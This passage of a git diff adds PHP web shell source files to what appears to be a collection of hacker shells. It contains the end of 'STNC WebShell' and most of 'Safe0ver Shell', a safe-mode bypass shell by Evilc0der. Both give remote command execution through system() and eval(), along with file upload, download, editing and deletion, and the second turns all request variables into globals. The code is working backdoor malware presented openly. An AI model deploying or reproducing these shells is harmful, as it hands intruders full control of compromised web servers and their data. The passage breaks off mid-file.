+if(isset($_POST["action"])) $action = $_POST["action"];
+else $action = "cmd";
+
+if(isset($_POST["pwd"]))
+{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
+
+$location = getcwd();
+
+if(($action === "download")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(file_exists($fname))
+  {
+    $pathinfo = pathinfo($fname);
+    header("Content-Transfer-Encoding: binary");
+    header("Content-type: application/x-download");
+    header("Content-Length: ".filesize($fname));
+    header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
+    readfile($fname);
+    die();
+  }
+  else
+    $printline = "\"$fname\" - download failed.";
+}
+
+echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
+textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
+scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
+scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
+td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
+.btn {background-color: #cfcfcf;} .pad {padding:5;}
+</style><title>  STNC WebShell v$version  </title></head><body><table width=100%>
+<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
+<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
+
+echo htmlspecialchars($printline)."\n";
+
+if($action === "cmd")
+{
+  if(isset($_POST["cmd"]))
+    $cmd = $_POST["cmd"];
+  else
+    $cmd = "ls -la";
+
+  $result = htmlspecialchars(cmd($cmd));
+
+  if($result === "")
+    $result = cmd("ls -la");
+
+  echo $result;
+  $location = getcwd();
+}
+elseif(($action === "edit")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  ob_start();
+
+  if(!readfile($fname))
+    echo "Cann't open file \"$fname\".";
+  else
+    $action_edit = true;
+
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
+{
+  $fname = $_POST["fname"];
+  $data = $_POST["data"];
+  $fid = fopen($fname, "w");
+  $fname = htmlspecialchars($fname);
+
+  if(!$fid)
+    echo "Cann't save file \"$fname\".";
+  else
+  {
+    fputs($fid, $data);
+    fclose($fid);
+    echo "File \"$fname\" is saved.";
+  }
+}
+elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(copy($_FILES["file"]["tmp_name"], $fname))
+    echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";      
+  else
+    echo "Upload failed!";
+}
+elseif(($action === "eval")&&(isset($_POST["code"])))
+{
+  $code = $_POST["code"];
+  ob_start();
+  eval($code);
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+
+echo "</textarea>".(($action_edit) ? "<br>".button("  Save  ").hidden("fname",$fname):"")."</center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button("    Edit    ")."</td></table></center></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
+  hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
+</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
+  hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
+</td></tr></table></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button("   Eval   ")."</center></td></form></tr>
+<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt b/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt
new file mode 100644
index 0000000..34d7f7c
--- /dev/null
+++ b/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	
@@ -0,0 +1,950 @@
+<?php 
+
+
+/*
+*****************************************************************************************
+*                           Safe0ver Shell //Safe Mod Bypass By Evilc0der                *
+***************************************************************************************** 
+*        Evilc0der.org is a Platform Which You can Publish Your Shell Script             *  
+
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */        
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "Safe0ver";
+$scriptident = "$scriptTitle By Evilc0der.org";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+    $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+    $Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "7 Subat 2007";
+$scriptver = "Bet@ Versiyon";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+                "Edit"         => "edit.gif",
+                "Download"     => "download.gif",
+                "Upload"     => "upload.gif",
+                "Delete"     => "delete.gif",
+                "View"         => "view.gif",
+                "Rename"     => "rename.gif",
+                "Move"         => "move.gif",
+                "Copy"         => "copy.gif",
+                "Execute"     => "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+    else
+         $img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+        setcookie("noauth","");
+        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+        Header( "HTTP/1.0  401  Unauthorized");
+        echo "Your username or password is incorrect";
+        exit ;
+                 
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+    return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+    for ( $i = 0; $i < $mp; $i++ )
+        $ret .= "&nbsp;";
+    return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+    if (is_dir($Fdir)) {
+        $Fh=@opendir($Fdir);
+         while ($Fbuf = readdir($Fh))
+             if (($Fbuf != ".") && ($Fbuf != ".."))
+                Mydeldir("$Fdir/$Fbuf");
+        @closedir($Fh);
+                return rmdir($Fdir);
+    }    else {
+        return unlink($Fdir);
+    }
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+    $size = $insize;
+    $add = "B";
+    if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "KB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "MB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "GB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "TB";
+     }
+     return "$size $add";
+}
+
+if ($cmd != "downl") {
+    ?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body {
+	font-size: 12px;
+	font-family: arial, helvetica;
+	scrollbar-width: 5;
+	scrollbar-height: 5;
+	scrollbar-face-color: white;
+	scrollbar-shadow-color: silver;
+	scrollbar-highlight-color: white;
+	scrollbar-3dlight-color:silver;
+	scrollbar-darkshadow-color: silver;
+	scrollbar-track-color: white;
+	scrollbar-arrow-color: black;
+	background-color: #CCCCCC;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{
+	font-size: 12px;
+	font-family: arial, helvetical;
+	BORDER-LEFT: black 0px solid;
+	BORDER-RIGHT: black 0px solid;
+	BORDER-TOP: black 0px solid;
+	BORDER-BOTTOM: black 0px solid;
+	COLOR: black;
+	background: #CCCCCC;
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+            BORDER-RIGHT: black 1px solid;
+            BORDER-TOP: black 1px solid;
+            BORDER-BOTTOM: black 1px solid;
+          }
+    .none  {       BORDER-LEFT: black 0px solid;
+            BORDER-RIGHT: black 0px solid;
+            BORDER-TOP: black 0px solid;
+            BORDER-BOTTOM: black 0px solid;
+          }
+    .inputtext {
+            background-color: #EFEFEF;
+            font-family: arial, helvetica;
+            border: 1px solid #000000;
+            height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #CCCCCC;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: #CCCCCC;
+            border: 1px solid #000000;
+            border-width: 1px;
+            height: 20;
+    }
+    .inputtextarea {
+            background-color: #CCCCCC;
+            border: 1px solid #000000;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: #EFEFEF;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: #EFEFEF;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: #EFEFEF;
+            scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+           BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: Black;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: #CCCCCC; }
+body,td,th {
+	color: #660000;
+}
+a:link {
+	color: #000000;
+	text-decoration: none;
+}
+a:hover {
+	color: #00FF00;
+	text-decoration: none;
+}
+a:active {
+	color: #666666;
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+.style5 {
+	color: #660000;
+	font-weight: bold;
+}
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+   <tr>
+     <td width="100%" class="silver border"><center>
+         <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+     </center></td>
+   </tr>
+ </table>
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP><br>
+
+    <?php
+}
+
+if ( $cmd=="dir" ) {
+      $h=@opendir($dir);
+     if ($h == false) {
+          echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
+                Script Gecisi Tamamlayamadi!
+                <br><br>".sp(3)."\n
+                Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
+                <br><br></font>\n\n\n\n";
+     }
+        if (function_exists('realpath')) {
+        $partdir = realpath($dir);
+    }
+        else {
+        $partdir = $dir;
+    }
+     if (strlen($partdir) >= 100) {
+         $partdir = substr($partdir, -100);
+         $pos = strpos($partdir, "/");
+         if (strval($pos) != "") {
+             $partdir = "<--   ...".substr($partdir, $pos);
+         }
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+     }
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+       <br>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+           <td class="border nobottom noright">
+            &nbsp;Listeliyor:&nbsp;
+      </td>
+          <td width="100%" class="border nobottom noleft">
+           <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+      </td>
+     </tr>
+    </table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+      <td width="100%" NOWRAP class="silver border">
+       &nbsp;Dosya Adi&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Yapilabilecekler&nbsp;&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Boyut&nbsp;
+      </td>
+          <td width=1 NOWRAP class="silver border noleft">
+       &nbsp;Yetkiler&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Son Düzenleme&nbsp;
+      </td>
+     <tr>
+    <?php
+
+
+          /* <!-- This whole heap of junk is the sorting section... */
+
+     $dirn     = array();
+     $filen     = array();
+     $filesizes    = 0;
+     while ($buf = readdir($h)) {
+        if (is_dir("$dir/$buf"))
+            $dirn[] = $buf;
+            else 
+             $filen[] = $buf;
+        }         
+        $dirno     = count($dirn) + 1;
+         $fileno    = count($filen) + 1;
+
+          function mycmp($a, $b){
+            if ($a == $b) return 0;
+            return (strtolower($a) < strtolower($b)) ? -1 : 1;
+        }
+
+        if (function_exists("usort")) {
+            usort($dirn, "mycmp");
+            usort($filen, "mycmp");
+        }
+        else {
+            sort ($dirn);
+             sort ($filen);
+         }
+    reset ($dirn);
+     reset ($filen);
+     if (function_exists('array_merge')) {
+        $filelist = array_merge ($dirn, $filen);
+    }
+     else {
+        $filelist = $dirn + $filen;
+    }
+
+    
+    if ( count($filelist)-1 > $Pmax ) {
+        $from = $Pidx * $Pmax;
+        $to = ($Pidx + 1) * $Pmax-1;
+        if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+            $to = count($filelist) - 1;
+        if ($to > count($filelist)-1)
+            $to = count($filelist)-1;
+        $Dcontents = array();
+        For ($Fi = $from; $Fi <= $to; $Fi++) {
+            $Dcontents[] = $filelist[$Fi];    
+        }
+
+    }
+    else {
+        $Dcontents = $filelist;
+    }
+    
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+        reset($tdcolors);
+        $tdcolor = arrval(each($tdcolors));      }
+                   
+         if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                      /* <!-- Dirname --> */
+            echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                  /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                 /* <!-- Rename --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                 /* <!-- Delete --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                /* <!-- End of Actions --> */
+            echo "&nbsp;&nbsp;</center></td>\n";
+                  /* <!-- Size --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+             echo "<strong>D</strong>";
+                if ( @is_readable("$dir/$file") ) {
+                   echo "<strong>R</strong>";
+             }
+             if (function_exists('is_writeable')) {
+                if ( @is_writeable("$dir/$file") ) {
+                     echo "<strong>W</stong>";
+                 }
+            }
+             else {
+                    echo "<strong>(W)</stong>";
+              }
+              if ( @is_executable("$dir/$file") ) {
+                 echo "<Strong>X<strong>";
+             }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+            echo "</tr>\n";
+
+            }
+          else { /* <!-- Then it must be a File... --> */
+                     /* <!-- Filename --> */
+            if ( @is_readable("$dir/$file") )
+                 echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+              else
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                 /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                 /* <!-- Rename --> */
+            echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Edit --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                 echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                   /* <!-- Copy --> */
+             echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                  /* <!-- Move --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                     echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                    /* <!-- Delete --> */
+            echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- Download --> */
+            echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                 /* <!-- Execute --> */
+            if ( @is_executable("$dir/$file") )
+                 echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                    /* <!-- End of Actions --> */
+            echo sp(2)."</center></td>\n";
+                 /* <!-- Size --> */
+            echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+             $size = @filesize("$dir/$file");
+             If ($size != false) {
+                    $filesizes += $size;
+                echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+            }
+            else
+                echo "&nbsp;&nbsp;<strong>0 B<strong>";
+             echo "&nbsp;&nbsp;</td>\n";
+
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+             if ( @is_readable("$dir/$file") )
+                 echo "<strong>R</strong>";
+               if ( @is_writeable("$dir/$file") )
+                 echo "<strong>W</stong>";
+               if ( @is_executable("$dir/$file") )
+                 echo "<Strong>X<strong>";
+               if (function_exists('is_uploaded_file')){
+                 if ( @is_uploaded_file("$dir/$file") )
+                     echo "<Strong>U<strong>";
+             }
+             else {
+                echo "<Strong>(U)<strong>";
+            }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+             echo "</tr>\n";
+         }
+      }
+
+        echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+      echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+      echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+      echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+    
+    function printpagelink($a, $b, $link = ""){
+        if ($link != "") 
+            echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+        else
+            echo "<b>| $a - $b |</b>";
+    }
+        
+    if ( count($filelist)-1 > $Pmax ) {
+        echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+        $Fi = 0;
+        while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+            $from = $Fi*$Pmax;
+            while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+            $to = ($Fi + 1) * $Pmax - 1;
+            if ($Fi == $Pidx)
+                $link="";
+            else 
+                $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+            printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+            echo "&nbsp;&nbsp;&nbsp;";
+            $Fi++;
+        }
+        $from = $Fi*$Pmax;
+        while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+        $to = count($filelist)-1;
+        if ($Fi == $Pidx)
+            $link="";
+        else 
+            $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+        printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+        
+    
+        echo "</center></td></tr></table></td></tr>";
+    }
+
+
+        echo "</table>\n<br><table NOWRAP>";
+
+      if ($isGoodver) {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+    }
+     else {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+    }
+              /* <!-- Other Actions --> */
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+      echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                         buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                 buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+      echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+      echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
+       echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+      echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+      echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
+      echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+      echo "</table></td>";
+     echo "</table>";
+     echo "<br>";
+         @closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+     echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (Mydeldir($file)==false) {
+             echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+    }
+     else {
+        echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+         <input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (@unlink($file)==false) {
+             echo "Could not remove \"$file\"<br>";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+        echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+        }
+     else {
